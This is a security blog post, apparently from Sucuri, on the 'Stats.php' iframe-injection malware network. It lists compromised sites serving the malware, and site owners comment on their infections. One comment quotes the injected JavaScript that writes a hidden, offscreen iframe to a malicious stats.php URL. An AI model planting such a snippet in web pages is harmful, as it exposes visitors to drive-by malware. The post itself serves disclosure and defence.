We are seeing a large and distributed malware network comprised of thousands of infected websites that is growing very quickly. We call it “Stats.php” because all of the infected websites have the following iframe added to them:
<iframe src="http://hackedsite.com/stats.php" name="Twitter" ..
Stats.php malware
Stats.php is an iFrame Injection attack. This is not a new issue by any means, and we have been posting details in Sucuri Labs for a little while. However, lately we started to see an increase in the number of websites getting hacked by it (a significant increase in the last 3 days).
Once inserted, these iFrames can be controlled to distribute the malware of course, but they can also be used to add things like drive-by downloads, and other types of browser-based attacks. Although the exact vector is unknown, the malware has been found across sites with know outdated software, and in some cases known vulnerable versions.
Here is a preliminary shortlist of websites we are seeing used to attack, and the number of websites that have been compromised by each:
2415 http://creativeironart.net/images/stats.php
1906 http://pahgawks.com/download/stats.php
1748 http://onmouseup.info/stats.php
1524 http://cabaniaseleden.com.ar/stats.php
1451 http://oxsanasiberians.com/downloads/stats.php
1312 http://pairedpixels.com/vaca/stats.php
364 http://duygumatbaa.com/stats.php
185 http://www.lifeshiftdevelopment.com/stats.php
124 http://poseyhumane.org/stats.php
87 http://www.clane.org/gallery/stats.php
40 http://drbolivar.com/stats.php
33 http://fontana-euronics.com/stats.php
7 http://www.orso.it/stats/php
.. and lots more sites ..
If you were to visit any of these directly, you would get either a blacklist warning from Google, or a 404 error as some have been removed already.
How does a distributed web-based malware network function?
Site-X.com is hacked and a malicious file named stats.php is inserted into it. An iFrame is then added to source code from Site-Y.com/stats.php. Site-Y.com is also compromised, it has a stats.php file added to it, and an iFrame from Site-Z.com/stats.php added. When all is said and done, you have a large network of compromised sites, all linking to each other and all with the same malware.
If you have any questions about Stats.php or you want to add more info, feel free to leave a comment, or email us at info@sucuri.net.
7 comments
Hi, I have a wordpress 3.0 site with this oxsanasiberians.com stats.php script. I can’t locate in which file the script is inserted (although it all started with changes to .htaccess and header.php, as well as file permissions). Scans say it comes on my homepage, but again I cant find the responsible file. I uploaded a nexw version of a backed up version, and still get the error. I wonder if the DB is also affected. Any clue?
I put details on wordpress forum here
http://wordpress.org/support/topic/malware-oxsanasiberianscom-attack
Is it only affecting WP sites? Is it specific to sites with PHP?
No it is beyond just wordpress. I was first following this as a Pharma-Hack. Which I believe I had, but now I have this. One of the things I did to slow it down was I deleted every single file in the root of my hosting account (even system files) uploaded a fresh copy from my masters. Then changed my FTP passwords. One of the times that I did this, while I was uploading I got a credentials prompt from my ftp software. But I have this saved in my software so it will autopopulate it. But this time, it had a scrambled username! Script generated! Which would prompt me to re-enter my real FTP info. My point is, I think I fell for this ONCE, but never again. But it has not been back. So I think this is how it originally got in. But my site still get hacked.
You cannot just delete the stats.php file. It randomly open .php files in my site, writes script to them to access or include another script that it has created and ALSO hidden on my site. So when you visit any of these files publically, it will re-install all of it again. Keep the malware alive and hence part of the network!
Our website was hacked on 6/7 and several key index.asp files edited to open a Java Script (jquery.effects.fade.min.js) which contained the following:
var _q = document.createElement(‘iframe’), _n = ‘setAttribute’;_q[_n](‘src’, ‘http://cabaniaseleden.com.ar/stats.php’);_q.style.position = ‘absolute’;_q.style.width = ’12px’;_q[_n](‘frameborder’, navigator.userAgent.indexOf(’39c33260f6d7671e2dae7f08d1087e22′) + 1);_q.style.left = ‘-4327px’;document.write(”);document.getElementById(‘pzeadv’).appendChild(_q);
The Java Script itself was installed in a “New_Folder” folder.
Our website is not a wordpress website!
I was able to solve this problem when I changed my FTP passwords and switched from Filezilla to WinSCP. Read about it here: http://unsharptech.com/2008/05/20/filezilla-ftp-passwords-stored-in-plaintext/
Comments are closed.